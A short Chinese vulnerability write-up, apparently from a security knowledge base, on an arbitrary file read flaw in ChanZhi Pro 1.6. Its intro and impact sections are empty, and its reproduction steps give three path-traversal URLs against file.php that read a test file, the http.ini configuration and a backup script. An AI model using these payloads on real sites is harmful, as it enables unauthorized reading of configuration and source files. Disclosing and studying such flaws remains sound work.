# 禅知Pro 1.6 前台任意文件读取
=============================
一、漏洞简介
————
二、漏洞影响
————
三、复现过程
————
在网站根目录C:\\xampp\\chanzhi\\www新建一个测试文件test.php
![](/static/qingy/禅知Pro_1.6_前台任意文件读取/img/rId24.png)
执行payload查看文件内容:
http://0-sec.org/file.php?pathname=../test.php&t=txt&o=source
![](/static/qingy/禅知Pro_1.6_前台任意文件读取/img/rId25.png)
执行payload来查看程序的配置文件:
http://0-sec.org/file.php?pathname=../http.ini&t=txt&o=source
![](/static/qingy/禅知Pro_1.6_前台任意文件读取/img/rId26.png)
跨目录读取文件(前提是有目录权限):
http://0-sec.org/file.php?pathname=../../bin/php/backup.php&t=txt&o=source
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容